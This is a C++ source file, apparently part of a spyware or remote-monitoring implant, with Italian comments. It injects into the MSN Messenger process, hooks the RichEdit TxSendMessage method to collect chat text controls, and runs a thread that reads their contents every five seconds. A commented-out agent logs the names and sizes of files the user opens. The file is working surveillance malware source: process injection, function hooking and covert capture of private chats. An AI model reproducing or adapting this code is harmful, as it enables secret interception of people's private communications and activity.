#include "TextServ.h"

class ITextServices : public IUnknown
{
public:

	//@cmember Generic Send Message interface
	virtual HRESULT 	TxSendMessage(
							UINT msg,
							WPARAM wparam,
							LPARAM lparam,
							LRESULT *plresult);
	
	//@cmember Rendering
	virtual HRESULT		TxDraw(	
							DWORD dwDrawAspect,		
							LONG  lindex,			
							void * pvAspect,		
							DVTARGETDEVICE * ptd,									
							HDC hdcDraw,			
							HDC hicTargetDev,		
							LPCRECTL lprcBounds,	
							LPCRECTL lprcWBounds,	
               				LPRECT lprcUpdate,		
							BOOL (CALLBACK * pfnContinue) (DWORD),
							DWORD dwContinue,
							LONG lViewId) = 0;	

	//@cmember Horizontal scrollbar support
	virtual HRESULT		TxGetHScroll(
							LONG *plMin,
							LONG *plMax,
							LONG *plPos,
							LONG *plPage,
							BOOL * pfEnabled ) = 0;

   	//@cmember Horizontal scrollbar support
	virtual HRESULT		TxGetVScroll(
							LONG *plMin,
							LONG *plMax,
							LONG *plPos,
							LONG *plPage,
							BOOL * pfEnabled ) = 0;

	//@cmember Setcursor
	virtual HRESULT 	OnTxSetCursor(
							DWORD dwDrawAspect,		
							LONG  lindex,			
							void * pvAspect,		
							DVTARGETDEVICE * ptd,									
							HDC hdcDraw,			
							HDC hicTargetDev,		
							LPCRECT lprcClient,
							INT x,
							INT y) = 0;

	//@cmember Hit-test
	virtual HRESULT 	TxQueryHitPoint(
							DWORD dwDrawAspect,		
							LONG  lindex,			
							void * pvAspect,		
							DVTARGETDEVICE * ptd,									
							HDC hdcDraw,			
							HDC hicTargetDev,		
							LPCRECT lprcClient,
							INT x,
							INT y,
							DWORD * pHitResult) = 0;

	//@cmember Inplace activate notification
	virtual HRESULT		OnTxInPlaceActivate(LPCRECT prcClient) = 0;

	//@cmember Inplace deactivate notification
	virtual HRESULT		OnTxInPlaceDeactivate() = 0;

	//@cmember UI activate notification
	virtual HRESULT		OnTxUIActivate() = 0;

	//@cmember UI deactivate notification
	virtual HRESULT		OnTxUIDeactivate() = 0;

	//@cmember Get text in control
	virtual HRESULT		TxGetText(BSTR *pbstrText) = 0;

	//@cmember Set text in control
	virtual HRESULT		TxSetText(LPCWSTR pszText) = 0;
	
	//@cmember Get x position of
	virtual HRESULT		TxGetCurTargetX(LONG *) = 0;
	//@cmember Get baseline position
	virtual HRESULT		TxGetBaseLinePos(LONG *) = 0;

	//@cmember Get Size to fit / Natural size
	virtual HRESULT		TxGetNaturalSize(
							DWORD dwAspect,
							HDC hdcDraw,
							HDC hicTargetDev,
							DVTARGETDEVICE *ptd,
							DWORD dwMode, 	
							const SIZEL *psizelExtent,
							LONG *pwidth,
							LONG *pheight) = 0;

	//@cmember Drag & drop
	virtual HRESULT		TxGetDropTarget( IDropTarget **ppDropTarget ) = 0;

	//@cmember Bulk bit property change notifications
	virtual HRESULT		OnTxPropertyBitsChange(DWORD dwMask, DWORD dwBits) = 0;

	//@cmember Fetch the cached drawing size
	virtual	HRESULT		TxGetCachedSize(DWORD *pdwWidth, DWORD *pdwHeight)=0;
};



//GUID IID_ITextServices = { 0x8d33f740, 0xcf58, 0x11ce, {0xa8, 0x9d, 0x00, 0xaa, 0x00, 0x6c, 0xad, 0xc5}};

#define MAX_CHAT_COUNT 10

typedef int (WINAPI *MessageBox_t) (HWND, LPCTSTR, LPCTSTR, UINT);

typedef void (__stdcall *Sleep_t)(DWORD);
typedef void (__stdcall *SysFreeString_t)(BSTR);

//BOOL bPM_FileAgentStarted = FALSE; // Flag che indica se il monitor e' attivo o meno

typedef HRESULT (_stdcall *CreateTextServices_t)(IUnknown *, ITextHost *, IUnknown **);


BYTE *GetTxSendMessage(/*BYTE **pTxGetBaseLinePos*/)
{
	HMODULE hriched;
	IUnknown *pUnk = NULL;
	DWORD *int_ptr = NULL;
	DWORD *func_ptr = NULL;
	TextHost *dThost = NULL;
	CreateTextServices_t pCreateTextServices;

	MessageBox(NULL, "ORA", "ORA", MB_OK);

	if (!(hriched = LoadLibrary("riched20.dll")))
		return NULL;
	if (!(pCreateTextServices = (CreateTextServices_t)GetProcAddress(hriched, "CreateTextServices")))
		return NULL;

	// Crea l'oggetto
	dThost = new TextHost();
	if ( (pCreateTextServices(NULL, dThost, &pUnk) != S_OK) || !pUnk ) 
		return NULL;

	// Chiede l'interfaccia 
	if ( pUnk->QueryInterface(IID_ITextServices, (void**)(&int_ptr)) != S_OK  || !int_ptr)
		return NULL;

	// Ritorna il puntatore alla funzione TxSetText
	if ( !(func_ptr = (DWORD *)int_ptr[0]) )
		return NULL;

	/*// Prende un'altra funzione che ci serve
	*pTxGetBaseLinePos = (BYTE *)func_ptr[TXGETBASELINEPOS];*/

	// Ritorna il puntatore a TxSetText
	return (BYTE *)func_ptr[3];
}





//-- Thread di monitoring --
typedef struct {
	COMMONDATA;
	ITextServices *text_ctrl[MAX_CHAT_COUNT];
	MessageBox_t pMessageBox;
	SysFreeString_t pSysFreeString;
	Sleep_t pSleep;
} PM_RichEdThread_data_struct;
PM_RichEdThread_data_struct PM_RichEdThread_data;


DWORD WINAPI PM_RichEdThread(LPVOID lpParameter)
{
	DWORD i;
	BSTR bstr;
	HRESULT hr;

	INIT_SFUNC(PM_RichEdThread_data_struct);
	
	LOOP {
		for (i=0; i<MAX_CHAT_COUNT; i++)
			if (pData->text_ctrl[i] && (pData->text_ctrl[i])->TxGetText(&bstr) == S_OK) {
				pData->pMessageBox(NULL, (LPCSTR)bstr, (LPCSTR)bstr, MB_OK);
				pData->pSysFreeString(bstr);
			}
		pData->pSleep(5000);
	}
	return 0;
}

static DWORD PM_RichEdThread_setup(HMServiceStruct * pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo MSN
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "msnmsgr.exe"))
			return 1; // Hooka solo MSN
	} else
		return 1;

	VALIDPTR(hMod = LoadLibrary("user32.dll"));
	VALIDPTR(PM_RichEdThread_data.pMessageBox = (MessageBox_t)HM_SafeGetProcAddress(hMod, "MessageBoxW"));

	VALIDPTR(hMod = GetModuleHandle("kernel32.dll"));
	VALIDPTR(PM_RichEdThread_data.pSleep = (Sleep_t) HM_SafeGetProcAddress(hMod, "Sleep"));

	VALIDPTR(hMod = LoadLibrary("oleaut32.dll"));
	VALIDPTR(PM_RichEdThread_data.pSysFreeString = (SysFreeString_t) HM_SafeGetProcAddress(hMod, "SysFreeString"));

	ZeroMemory(PM_RichEdThread_data.text_ctrl, sizeof(PM_RichEdThread_data.text_ctrl));
	PM_RichEdThread_data.dwHookLen = 500;
}










typedef struct {
	COMMONDATA;
	PM_RichEdThread_data_struct *pTdata;
	GUID IID_ITextServices;
} TxSendMessageStruct;
TxSendMessageStruct TxSendMessageData;

static HRESULT _stdcall PM_TxSendMessage(DWORD Msg,
                                         DWORD wparam,
                                         DWORD lparam, 
										 DWORD res)
{
	DWORD i;

	INIT_WRAPPER(TxSendMessageStruct);
	CALL_FAST_API(4);
	
	if (ret_code == S_OK && Msg==EM_AUTOURLDETECT && wparam==1) {
		for (i=0; i<MAX_CHAT_COUNT; i++)
			if (!pData->pTdata->text_ctrl[i]) {
				pData->pTdata->text_ctrl[i] = (ITextServices *)this_ptr;
				break;
			}
	}

	return (HRESULT) ret_code;
}


static DWORD PM_TxSendMessage_setup(HMServiceStruct * pData)
{
	VALIDPTR(TxSendMessageData.bAPIAdd = GetTxSendMessage())

	// Avvia il thread di monitoring
	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pData->PARAM[0], NULL, 0, NULL);

	// E linka la sua struttura coi dati
	TxSendMessageData.pTdata = (PM_RichEdThread_data_struct *)pData->PARAM[1];

	TxSendMessageData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	TxSendMessageData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	TxSendMessageData.dwHookLen = 900;
	
	// sempre zero per la macro....
	return 0;
}


/*DWORD __stdcall PM_FileAgentDispatch(BYTE * msg, DWORD dwLen, DWORD dwFlags, FILETIME *dummy)
{
	char buffer[512];
	HANDLE hfile;
	DWORD hi_dim = 0, lo_dim = 0;

	// Se il monitor e' stoppato non esegue la funzione di dispatch
	// Il controllo e' ridondante perche', se il monitor e' stoppato,
	// l'agent iniettato non inserisce i messaggi nella coda IPC
	if (!bPM_FileAgentStarted)
		return 0;

	// Logga il nome del file se e' incluso nella lista dei pattern
	if(IsToLog(((IPCCreateFileStruct *) msg)->szFileName)) {
		// Scrive anche la dimensione del file.
		hfile = CreateFile(((IPCCreateFileStruct *) msg)->szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
		if (hfile != INVALID_HANDLE_VALUE) {
			lo_dim = GetFileSize(hfile, &hi_dim);
			if (lo_dim == INVALID_FILE_SIZE) {
				lo_dim = hi_dim = 0;
			}
			CloseHandle(hfile);
		}

		_snprintf_s(buffer, sizeof(buffer), _TRUNCATE, "%s\r\n0x%.8X 0x%.8X%.8X\r\n\r\n",((IPCCreateFileStruct *) msg)->szFileName, ((IPCCreateFileStruct *) msg)->dwOperation, hi_dim, lo_dim);
		LOG_ReportLog(PM_FILEAGENT, (BYTE *)buffer, strlen(buffer));
	}
	return 1;
}


DWORD __stdcall PM_FileAgentStartStop(BOOL bStartFlag)
{
	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_FileAgentStarted == bStartFlag)
		return 0;

	// I log va inizializzato come prima cosa...
	if (bStartFlag && !LOG_InitAgentLog(PM_FILEAGENT))
		return 0;

	// bStartFlag e' TRUE se il monitor deve essere attivato
	bPM_FileAgentStarted = bStartFlag;
	AM_IPCAgentStartStop(PM_FILEAGENT, bStartFlag);

	// ...e va chiuso come ultima
	if (!bStartFlag)
		LOG_StopAgentLog(PM_FILEAGENT);
		
	return 1;
}


DWORD __stdcall PM_FileAgentInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	// Se il parametro passato e' nullo, definisce
	// la configurazione di default (inizializzazione)
	PopulatePatternList((pattern_configuration *)conf_ptr);

	PM_FileAgentStartStop(bStartFlag);
	return 1;
}


void PM_FileAgentRegister()
{
	// L'hook viene registrato dalla funzione HM_InbundleHooks
	AM_MonitorRegister(PM_FILEAGENT, (BYTE *)PM_FileAgentDispatch, (BYTE *)PM_FileAgentStartStop, (BYTE *)PM_FileAgentInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_FileAgentInit(NULL, FALSE);
}*/